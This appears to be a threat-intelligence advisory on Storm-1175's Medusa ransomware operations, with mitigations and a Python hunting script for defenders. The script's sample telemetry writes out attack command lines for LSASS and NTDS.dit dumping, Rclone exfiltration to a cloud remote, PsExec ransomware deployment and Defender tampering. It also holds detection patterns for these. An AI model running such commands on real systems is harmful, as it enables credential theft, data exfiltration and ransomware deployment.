
April 7, 2026

Storm‑1175 exploits web‑facing vulnerabilities in Medusa ransomware operations


At a glance: Storm-1175 is a financially motivated threat actor linked to China that rapidly exploits newly disclosed vulnerabilities in internet-facing systems to deploy Medusa ransomware. The key risk is speed: the group has weaponized flaws within hours of disclosure, and in some cases before it. By relying on legitimate administrative tools, they are also able to blend in and evade detection. Organizations should treat new perimeter vulnerabilities as urgent, patch immediately, limit RMM usage, and watch closely for unusual admin activity or data movement.

Threat summary

On April 6, 2026, Microsoft published a security report on Storm‑1175, a threat actor active since at least 2023 and linked to China. The group appears financially motivated rather than state‑sponsored and is responsible for multiple Medusa ransomware deployments. Targeted sectors include healthcare, education, professional services, and finance across Australia, the United Kingdom, and the United States.

Storm‑1175 focuses on exploiting newly disclosed vulnerabilities in internet‑facing systems and then leveraging legitimate administrative tools to move laterally. To date, the group has exploited more than 16 vulnerabilities across major enterprise platforms, including Microsoft Exchange, PaperCut, Ivanti, ConnectWise, TeamCity, GoAnywhere, SmarterMail, and BeyondTrust.

Microsoft’s analysis shows that the group operates at a rapid pace. Storm‑1175 monitors vulnerability disclosures closely and develops working exploits faster than most organizations can patch. They have exploited vulnerabilities within hours of disclosure and, in several cases, before public disclosure. Examples include SmarterMail CVE‑2026‑23760 and GoAnywhere MFT CVE‑2025‑10035, both exploited a week prior to disclosure, and SAP NetWeaver CVE‑2025‑31324, exploited one day after disclosure.

Once inside a network, Storm‑1175 follows a consistent post‑exploitation process. The group establishes command‑and‑control through legitimate remote monitoring and management tools, including SimpleHelp, Atera, N‑able, ScreenConnect, AnyDesk, and MeshAgent, allowing their activity to blend with routine administration. Lateral movement is carried out using PowerShell, PsExec, Windows Management Instrumentation, and Cloudflare tunnels.

Their credential‑theft activity includes LSASS dumping, NTDS.dit extraction, and harvesting Veeam credentials. They also disable Microsoft Defender Antivirus through registry changes and broad exclusion paths to reduce detection. Data exfiltration typically occurs through Rclone. Medusa ransomware variants, including Gaze.exe, are then mass‑deployed across the environment using PDQ Deploy or Group Policy.

Analysis

Storm‑1175’s operations show that the primary risk is the gap between vulnerability disclosure and patching. Their ability to exploit flaws within hours, and in some cases before disclosure, means any internet-facing system with a known vulnerability should be assumed to be high risk. Their use of legitimate RMM tools and standard administrative utilities reduces early detection opportunities, and their focus on domain controllers, backup systems, and endpoint protection settings increases the likelihood of successful ransomware deployment and complicates recovery.

The most effective defenses are those that reduce exposure on perimeter assets, restrict administrative pathways, and harden identity and endpoint controls.

  • Prioritize rapid patching for all internet-facing systems; treat new CVEs affecting perimeter services as emergency changes.
  • Restrict RMM usage to approved tools, enforce MFA, and alert on any unapproved installations or executions.
  • Strengthen identity protections by enforcing least privilege, monitoring for credential access attempts, and securing backup infrastructure with MFA and segmentation.
  • Lock down endpoint protection settings with tamper-resistant policies and treat any configuration changes as high risk events.
  • Monitor for unusual data movement activity and unauthorized use of deployment tools such as PDQ or GPO, which often precede ransomware execution.
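The post‑exploitation chain in the threat summary (unapproved RMM tooling, Defender disabled through policy registry values and broad exclusions, LSASS and NTDS.dit extraction, Rclone exfiltration, and mass deployment with PDQ or PsExec) maps directly onto the monitoring recommendations above. The following is an added example of that detection logic run over constructed sample telemetry; it is not Microsoft’s detection content and not part of the original page. The RMM allowlist, the deployment‑admin accounts, the image names, the sample hosts and users, and the registry paths in the sample events are all assumptions made for the example. The correlation step goes a little beyond the text: instead of alerting on each event in isolation, it escalates a host once several distinct stages of the chain have been seen on it.

```python
"""Hunting rules for the Storm-1175 tradecraft described above, run over
constructed sample telemetry (process-creation and registry-set events).
Added example, not Microsoft's detection logic; allowlists, image names,
hosts, users and sample events are assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass

APPROVED_RMM = {"screenconnect"}           # assumption: the org's sanctioned RMM tool
DEPLOYMENT_ADMINS = {"corp\\svc-pdq"}      # assumption: accounts allowed to mass-deploy
RMM_TAGS = {"simplehelp", "atera", "n-able", "screenconnect", "anydesk", "meshagent"}
DEPLOY_TAGS = {"pdqdeploy", "psexec"}
DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"
EXCLUSION_MARKER = "\\exclusions\\paths\\"
DISABLE_VALUES = {"disableantispyware", "disablerealtimemonitoring"}
# A drive root or a top-level directory excluded from scanning is treated as "broad".
BROAD_PATH = re.compile(r"^[a-z]:\\?(windows|users|programdata|program files( \(x86\))?)?\\?$", re.I)
LSASS_DUMP = re.compile(r"lsass|comsvcs.*minidump", re.I)       # procdump / comsvcs MiniDump
NTDS_EXTRACT = re.compile(r"ntds\.dit|\bifm\b", re.I)            # direct copy or ntdsutil ifm
RCLONE_REMOTE = re.compile(r"(?:^|\s)[\w-]{2,}:")                # "remote:" but not a drive "C:"

@dataclass
class Event:
    kind: str            # "process" or "registry"
    host: str
    user: str
    image: str = ""      # process: image path
    cmdline: str = ""    # process: command line
    key: str = ""        # registry: full path of the value written
    data: str = ""       # registry: new data

def image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower().removesuffix(".exe")

def tag_of(name, tags):
    return next((t for t in tags if t in name), None)

def classify(e):
    """Return (rule, severity) for one event, or None when no rule fires."""
    if e.kind == "process":
        name = image_name(e.image)
        rmm = tag_of(name, RMM_TAGS)
        if rmm and rmm not in APPROVED_RMM:
            return "unapproved_rmm", "high"
        if name != "lsass" and LSASS_DUMP.search(e.cmdline):
            return "lsass_dump", "critical"
        if name == "ntdsutil" or NTDS_EXTRACT.search(e.cmdline):
            return "ntds_extraction", "critical"
        if name == "rclone" and RCLONE_REMOTE.search(e.cmdline):
            return "rclone_exfil", "critical"
        if tag_of(name, DEPLOY_TAGS) and e.user.lower() not in DEPLOYMENT_ADMINS:
            return "unauthorized_deployment_tool", "high"
        return None
    key = e.key.lower()
    if not key.startswith(DEFENDER_POLICY):
        return None
    if EXCLUSION_MARKER in key:                       # value name is the excluded path itself
        path = key.split(EXCLUSION_MARKER, 1)[1]
        return ("defender_broad_exclusion", "critical") if BROAD_PATH.match(path) \
            else ("defender_exclusion_added", "medium")
    if key.rsplit("\\", 1)[-1] in DISABLE_VALUES and e.data.strip() == "1":
        return "defender_disabled", "critical"
    return None

def hunt(events):
    findings = []
    for e in events:
        hit = classify(e)
        if hit:
            findings.append({"host": e.host, "user": e.user, "rule": hit[0],
                             "severity": hit[1], "evidence": e.cmdline or e.key})
    return findings

STAGES = {"unapproved_rmm": "c2", "lsass_dump": "credentials", "ntds_extraction": "credentials",
          "defender_disabled": "defense_evasion", "defender_broad_exclusion": "defense_evasion",
          "rclone_exfil": "exfiltration", "unauthorized_deployment_tool": "deployment"}

def hosts_with_precursor_chain(findings, minimum=3):
    """Hosts showing at least `minimum` distinct stages: escalate as a ransomware precursor."""
    stages = defaultdict(set)
    for f in findings:
        if f["rule"] in STAGES:
            stages[f["host"]].add(STAGES[f["rule"]])
    return {h: sorted(s) for h, s in stages.items() if len(s) >= minimum}

# Constructed sample telemetry (not real logs); paths and command lines are illustrative.
SAMPLE_EVENTS = [
    Event("process", "ws07", "corp\\jdoe", "C:\\Users\\jdoe\\Downloads\\AnyDesk.exe", "AnyDesk.exe --silent"),
    Event("process", "ws07", "corp\\admin", "C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.WindowsClient.exe",
          "ScreenConnect.WindowsClient.exe"),
    Event("registry", "dc01", "corp\\jdoe", key="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware", data="1"),
    Event("registry", "dc01", "corp\\jdoe", key="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\", data="0"),
    Event("registry", "ws07", "corp\\it", key="HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Program Files\\Vendor\\App", data="0"),
    Event("process", "dc01", "corp\\jdoe", "C:\\Windows\\System32\\ntdsutil.exe",
          'ntdsutil "ac i ntds" "ifm" "create full C:\\temp\\x" q q'),
    Event("process", "dc01", "corp\\jdoe", "C:\\temp\\procdump64.exe", "procdump64.exe -accepteula -ma lsass.exe C:\\temp\\l.dmp"),
    Event("process", "dc01", "corp\\jdoe", "C:\\temp\\rclone.exe", "rclone.exe copy C:\\Shares\\Finance mega:exfil --transfers 16"),
    Event("process", "ws07", "CORP\\svc-pdq", "C:\\Program Files\\Admin Arsenal\\PDQ Deploy\\PDQDeploy.exe", "PDQDeploy.exe"),
    Event("process", "dc01", "corp\\jdoe", "C:\\temp\\PsExec64.exe", "PsExec64.exe \\\\* -d -s cmd /c C:\\temp\\gaze.exe"),
    Event("process", "ws07", "corp\\jdoe", "C:\\Windows\\System32\\tasklist.exe", "tasklist /v"),
]

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['severity']:8} {f['host']:5} {f['user']:14} {f['rule']:30} {f['evidence']}")
    print("precursor chain on:", hosts_with_precursor_chain(found))
```

The single-event rules are deliberately noisy (any Rclone run against a configured remote, any Defender exclusion written through policy); the correlation step is what turns them into an actionable escalation, since a domain controller that shows credential dumping, Defender tampering and exfiltration together is exactly the state the summary describes immediately before mass deployment. In a real pipeline the allowlists would come from the RMM and deployment-tool inventory rather than from constants.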

 
